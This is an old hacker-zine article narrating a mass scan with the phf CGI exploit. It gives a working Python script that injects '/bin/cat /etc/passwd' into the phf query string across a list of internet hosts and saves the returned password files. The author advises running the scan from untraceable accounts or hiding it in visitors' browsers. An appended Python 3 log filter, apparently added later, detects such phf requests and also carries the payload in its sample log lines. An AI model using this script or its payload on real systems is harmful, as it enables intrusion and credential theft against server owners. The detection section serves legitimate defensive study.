ExploiteD!
By Phf

It was a cold November afternoon and I had grown bored with my fungoidal pleasures. So I opened up the latest issue of 2600 mag and began reading. Contained therein was the insidious Phf script written in Python. I fired up my Linux box and banged in the script, only to find that I hadn't installed Python. A quick file grab from sunsite and it was up and running, now only if I could find a good list of internet addresses.

Boing! Like an early morning pee-on, I quickly ftp'd out to internic and nabbed the zone files. After a liberal application of the cut util, a sort and a uniq, I had a clean, usable list. With great expectations I fired up the script and was disappointed to find that it didn't work with the latest version of Python.

The following is a slightly modified version that I managed to make work. Mind you, I removed all the other pre-appends that appear in the original, and should you find yourself with a LAN connection to the net, feel free to put 'em back in.

For your enjoyment and absolute incrimination, here is said script...

<cut here>

#!/usr/local/bin/python
combos=' ','www.'
import string
import urllib
import os
def convert_link(link):
 temp=" "
 for u in link:
  if u== '.':
   u='_'
 temp = temp+u
 return temp
filename=raw_input("Filename to use? ")
logfilename=raw_input("Logfile to use? ")
output_path=raw_input("Out PutPath with trailing BackSlash ")

hostfile=open(filename,'r')
logfile=open(logfilename,'a')
flag=0
while not flag:
 link=string.strip(hostfile.readline())
 if link!=' ':
  for u in combos:
   thislink=u+link
   print "Trying host :"+thislink
   try:
    tempfile=urllib.urlretrieve("http://"+thislink+"/cgi-bin/phf?Jserver="\
    +"thislink%0A/bin/cat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Q"\
    +"nickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhighschool=&Q"\
    +"slip=HTTP/1.0")
   except:
    print "Host "+thislink+" error connecting"
    logfile.write("error connecting: ")
   try:
    os.rename(tempfile[0], output_path+thislink)
   except:
    print "tempfile dosnt exist"
   logfile.write(thislink+"\r\n")
if link==' ':
 flag=1

<stop cut here>

 

Now for the retch of the story...

The script worked like a charm, site after site was hit, over and over again it logged the results... some contained useful information... password philes and such. But one, my little spores, contained a message for the user of the PHF exploit.

Your attempt to hack this system has been logged, CERT will be advised. Furthermore the SysAdmin at <ip address that you are coming from> will be contacted. Blah Blah Blah.

Apparently some sadistic fuck of a sysadmin had replaced his phf bin with a perl script to rape us poor little explorers of the backwaters of the internet. At first I thought, "Hey, it's just a message to scare people away..." But no no, my droogies... it was for real, for my sysadmin was contacted and I was raked over the coals, with the threat of losing my pre-paid six month account.

Fortunately for me, PB at compusmart was understanding and let me off with a warning... And with this little page, I too warn you of the dangers of hacking from your own account. Should you wish to run the Phf exploit across the entire collection of i-net addresses, be warned... do it from a free service that doesn't care who you are. Or better yet, code it in Java and have it run on other people's browsers after they connect to your cool Warez page.

Source soon to come <grin>...

<eof> Phungus Out...
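
Seen from the server side, the request this script sends stands out in an access log, which is how the sysadmin in the story could notice and report it. The following is an added example, not part of the original article: a Python 3 log filter that flags requests to /cgi-bin/phf and marks those whose query string decodes to a newline. The sample log lines, addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote

# Constructed sample lines in Common Log Format; addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Nov/1996:14:02:11 -0700] "GET /index.html HTTP/1.0" 200 1043
198.51.100.7 - - [12/Nov/1996:14:02:15 -0700] "GET /cgi-bin/phf?Jserver=x%0A/bin/cat%20/etc/passwd%0A&Qalias=&Qname=foo HTTP/1.0" 200 512
198.51.100.7 - - [12/Nov/1996:14:02:16 -0700] "GET /CGI-BIN/phf?Jserver=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 0
203.0.113.5 - - [12/Nov/1996:14:03:40 -0700] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 230
203.0.113.9 - - [12/Nov/1996:14:04:01 -0700] "GET /docs/phf.html HTTP/1.0" 200 88
"""

# host ident user [timestamp] "METHOD target ..." status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

def classify(target):
    """Return 'injection', 'probe' or None for one request target."""
    parts = urlsplit(target)
    # Decode and lower-case the path so encoded or odd-case variants are still
    # logged; the status code shows whether the server actually served them.
    path = unquote(parts.path).lower()
    if not path.endswith("/cgi-bin/phf"):
        return None
    query = unquote(parts.query)
    # A CR or LF after decoding is the marker of the command injection.
    if "\n" in query or "\r" in query:
        return "injection"
    return "probe"

def scan(log_text):
    """Group flagged requests by source address."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        src, when, _method, target, status = m.groups()
        verdict = classify(target)
        if verdict:
            hits[src].append((when, verdict, int(status)))
    return dict(hits)

if __name__ == "__main__":
    for src, events in scan(SAMPLE_LOG).items():
        for when, verdict, status in events:
            print(f"{src} {when} {verdict} status={status}")
```

A plain form lookup is reported as a probe and the newline-bearing requests as injection, so the two can be alerted on at different severities.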